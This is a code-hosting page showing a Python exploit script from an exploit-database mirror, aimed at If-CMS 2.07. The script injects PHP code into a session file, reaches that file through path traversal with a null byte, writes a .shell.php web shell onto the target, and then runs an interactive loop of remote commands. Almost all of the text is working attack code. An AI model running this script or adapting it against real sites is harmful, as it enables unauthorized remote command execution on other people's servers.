PageRenderTime 37ms CodeModel.GetById 8ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/php/webapps/16980.py

https://bitbucket.org/DinoRex99/exploit-database
Python | 153 lines | 134 code | 9 blank | 10 comment | 8 complexity | fdab277db2b4da36eeed3cff976fc2ad MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. #!/usr/bin/python

    2. 

  2. # ~INFORMATION

    3. 

  3. # Exploit Title:	If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit

    4. 

  4. # Author:		TecR0c

    5. 

  5. # Date:			13/3/2011

    6. 

  6. # Software link:	http://bit.ly/hh9ZB4

    7. 

  7. # Tested on:		Linux bt

    8. 

  8. # Version:		2.07

    9. 

  9. # PHP.ini Settings:	gpc_magic_quotes = Off

    10. 

  10. 

    11. 

  11. import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass

    12. 

  12. from optparse import OptionParser

    13. 

  13. from urlparse import urlparse,urljoin

    14. 

  14. from urllib import urlopen

    15. 

  15. from cookielib import CookieJar

    16. 

  16. 

    17. 

  17. __CONTACT__ ="TecR0c(tecr0c@tecninja.net)"

    18. 

  18. __DATE__ ="13.3.2011" 

    19. 

  19. 

    20. 

  20. usage = 'Example : %s http://localhost/ncms/ -p 127.0.0.1:8080' % __file__

    21. 

  21. parser = OptionParser(usage=usage)

    22. 

  22. parser.add_option("-p","--proxy", type="string",action="store", dest="proxy",

    23. 

  23.         help="HTTP Proxy <server>:<port>")

    24. 

  24. 

    25. 

  25. (options, args) = parser.parse_args()

    26. 

  26. 

    27. 

  27. if options.proxy:

    28. 

  28.         print '[+] Using Proxy'+options.proxy

    29. 

  29. 

    30. 

  30. # User Agents

    31. 

  31. agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",

    32. 

  32.         "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",

    33. 

  33.         "Google Chrome 0.2.149.29 (Windows XP)",

    34. 

  34.         "Opera 9.25 (Windows Vista)",

    35. 

  35.         "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",

    36. 

  36.         "Opera/8.00 (Windows NT 5.1; U; en)"]

    37. 

  37. agent = random.choice(agents)

    38. 

  38. 

    39. 

  39. traversal = '../../../../../../../../../../../..'

    40. 

  40. sessionLocation = '/var/lib/php5/'

    41. 

  41. 

    42. 

  42. def banner():

    43. 

  43.     if os.name == "posix":

    44. 

  44.         os.system("clear")

    45. 

  45.     else:

    46. 

  46.         os.system("cls")

    47. 

  47.     header = '''

    48. 

  48. |----------------------------------------|

    49. 

  49. |Exploit: If-CMS 2.07 LFI RCE

    50. 

  50. |Author: %s

    51. 

  51. |Date: %s

    52. 

  52. |----------------------------------------|\n

    53. 

  53. '''%(__CONTACT__,__DATE__)

    54. 

  54.     for i in header:

    55. 

  55.         print "\b%s"%i,

    56. 

  56.         sys.stdout.flush()

    57. 

  57.         time.sleep(0.005)

    58. 

  58. 

    59. 

  59. def injectPayload():

    60. 

  60. 	webSiteUrl = url.geturl()+'index.php?newlang=<?php;system(base64_decode($_REQUEST[cmd]));?>'

    61. 

  61.         try:

    62. 

  62.                 opener.open(webSiteUrl)

    63. 

  63.         except:

    64. 

  64.                 print '[-] Failed'

    65. 

  65. 

    66. 

  66. def proxyCheck():

    67. 

  67.         if options.proxy:

    68. 

  68.                 try:

    69. 

  69.                         h2 = httplib.HTTPConnection(options.proxy)

    70. 

  70.                         h2.connect()

    71. 

  71.                         print "[+] Using Proxy Server:",options.proxy

    72. 

  72.                 except(socket.timeout):

    73. 

  73.                         print "[-] Proxy Timed Out\n"

    74. 

  74.                         pass

    75. 

  75.                         sys.exit(1)

    76. 

  76.                 except(NameError):

    77. 

  77.                         print "[-] Proxy Not Given\n"

    78. 

  78.                         pass

    79. 

  79.                         sys.exit(1)

    80. 

  80.                 except:

    81. 

  81.                         print "[-] Proxy Failed\n"

    82. 

  82.                         pass

    83. 

  83.                         sys.exit(1)

    84. 

  84. 

    85. 

  85. def getProxy():

    86. 

  86.         try:

    87. 

  87.                 proxy_handler = urllib2.ProxyHandler({'http': options.proxy})

    88. 

  88.         except(socket.timeout):

    89. 

  89.                 print "\n[-] Proxy Timed Out"

    90. 

  90.                 sys.exit(1)

    91. 

  91.         return proxy_handler

    92. 

  92. 

    93. 

  93. cj = CookieJar()

    94. 

  94. if options.proxy:

    95. 

  95.         opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))

    96. 

  96. else:

    97. 

  97.         opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

    98. 

  98. opener.addheaders = [('User-agent', agent)]

    99. 

  99. 

    100. 

  100. def postRequestWebShell(encodedCommand):

    101. 

  101.         webSiteUrl = url.geturl()+'.shell.php'

    102. 

  102.         commandToExecute = [

    103. 

  103.         ('cmd',encodedCommand)]

    104. 

  104.         cmdData = urllib.urlencode(commandToExecute)

    105. 

  105.         try:

    106. 

  106.                 response = opener.open(webSiteUrl, cmdData).read()

    107. 

  107.         except:

    108. 

  108.                 print '[-] Failed'

    109. 

  109.                 sys.exit()

    110. 

  110.         return response

    111. 

  111. 

    112. 

  112. def writeOutShell(encodedCommand):

    113. 

  113. 	cookieString = str(cj)

    114. 

  114. 	cookieSearch = re.compile(r"PHPSESSID=(.*) f")

    115. 

  115. 	session_value = cookieSearch.search(cookieString)

    116. 

  116. 	if session_value:

    117. 

  117. 		session_value = session_value.group(1)

    118. 

  118. 	cj.clear()

    119. 

  119. 	webSiteUrl = url.geturl()+'index.php?cmd='+encodedCommand+'&newlang='+traversal+sessionLocation+'sess_'+session_value+'%00'

    120. 

  120. 	try:

    121. 

  121.                 opener.open(webSiteUrl)

    122. 

  122.         except:

    123. 

  123.                 print '[-] Failed'

    124. 

  124.                 sys.exit()

    125. 

  125. 

    126. 

  126. def commandLine():

    127. 

  127.         encodedCommand = "echo '<?php system(base64_decode($_REQUEST[cmd]));?>' > .shell.php"

    128. 

  128.         encodedCommand = base64.b64encode(encodedCommand)

    129. 

  129.         writeOutShell(encodedCommand)

    130. 

  130.         commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)

    131. 

  131.         while True:

    132. 

  132.                 try:

    133. 

  133.                         command = raw_input(commandLine)

    134. 

  134.                         encodedCommand = base64.b64encode(command)

    135. 

  135.                         response = postRequestWebShell(encodedCommand)

    136. 

  136.                         print response

    137. 

  137.                 except KeyboardInterrupt:

    138. 

  138.                         encodedCommand = base64.b64encode('rm .shell.php')

    139. 

  139.                         postRequestWebShell(encodedCommand)

    140. 

  140.                         print "\n[!] Removed .shell.php\n"

    141. 

  141.                         sys.exit()

    142. 

  142. 

    143. 

  143. if "__main__" == __name__:

    144. 

  144.         banner()

    145. 

  145.         try:

    146. 

  146.                 url=urlparse(args[0])

    147. 

  147.         except:

    148. 

  148.                 parser.print_help()

    149. 

  149.                 sys.exit()

    150. 

  150.         getProxy()

    151. 

  151.         proxyCheck()

    152. 

  152. 	injectPayload()

    153. 

  153. 	commandLine()
    154.